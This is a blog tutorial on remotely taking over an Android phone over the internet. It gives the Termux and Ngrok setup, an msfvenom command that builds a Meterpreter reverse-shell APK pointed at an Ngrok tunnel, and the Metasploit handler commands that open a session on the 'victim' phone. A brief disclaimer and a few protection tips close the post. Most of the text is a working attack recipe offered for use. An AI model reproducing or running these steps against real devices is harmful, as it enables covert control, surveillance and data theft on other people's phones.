Hi Friends. I hope you guys doing well. So, my previous post was about Hack an Android phone on Local Area Network But today's post will take you to the next level. 

We will Hack Android phones Over the internet or a WAN without Port forwarding. For this purpose, we need to create a  tunnel between your phone and the victim's phone. 

To do this we have to use Ngrok. Yes! Ngrok will provide a TCP tunnel between two parties.


Devices and Tools: 

  1. A non-rooted Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
  2. Termux Application on my Android Phone. 
  3. Metasploit Framework. 
  4. Mi Phone (It will act as a Victim Phone). 
  5. Ngrok

Disclaimer: This post is for educational purposes only  Do not try this on an individual phone. All the tests I have done on my own phone. 

1. How to install Ngrok in Termux:


Below Screenshot is my Ngrok Dashboard. Here this will provide you a token and it will act as Authorization for your TCP tunnel.

 Download Link: Ngrok file

After downloading the file extract it and save it in the internal storage of your android phone /sd card/ngrok/ngrok

Note: Rename the file ngrok from ngrok-stable-Linux-arm 

ngrok_Metasplot_Termux

cp /sdcard/ngrok/ngrok $HOME: Copy the ngrok file in Home.

chmod +x ngrok :  It means that you want to make the file executable.

cd..: When you type this command you will see two directories Home & Usr.


cp home/ngrok usr/bin: Copying the file from Home to Usr directory

After typing the above commands type ls and your ngrok file will be added to the user directory.


ngrok_Metasplot_Termux_2

./ngrok authtoken <paste the copied authorization token here>

ngrok tcp 4444 
 
ngrok_Metasplot_Termux_3

Port forwarding is completed and now it's time to create a payload.

2. Create a Payload in Metasploit:

cd metasploit-framework
./msfvenom -p android/meterpreter/reverse_tcp LHOST="Copy from Ngrok's Session" LPORT="Copy from Ngrok's Session" R > /sdcard/hackming.apk
LHOST= 0.tcp.ngrok.io
LPORT= 12345 


I am taking it as an example you can type a given value near the 0.tcp.ngrok.io.

3. Use Metasploit Framework:

    ./msfconsole
     use exploit/multi/handler 
     set payload android/meterpreter/reverse_tcp
     set lhost Localhost
     set lport 4444
    exploit


    Some Useful Commands in Metasploit Exploit Section:

    ngrok_Metasplot_Termux_Commands

    A drawback with this method, you can’t get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port. But do not worry I have a solution for that which I will discuss in my next post.

      How you can protect yourself?

      1. Only install apps and software from the google play store.
      2. Make sure you don’t have to enable installs from unknown sources enabled.
      3. Keep your phone with you at all times.
      4. Avoid opening any suspicious links in emails or messages. 
       
      Subscribe to my Newsfeed to get the latest post updates.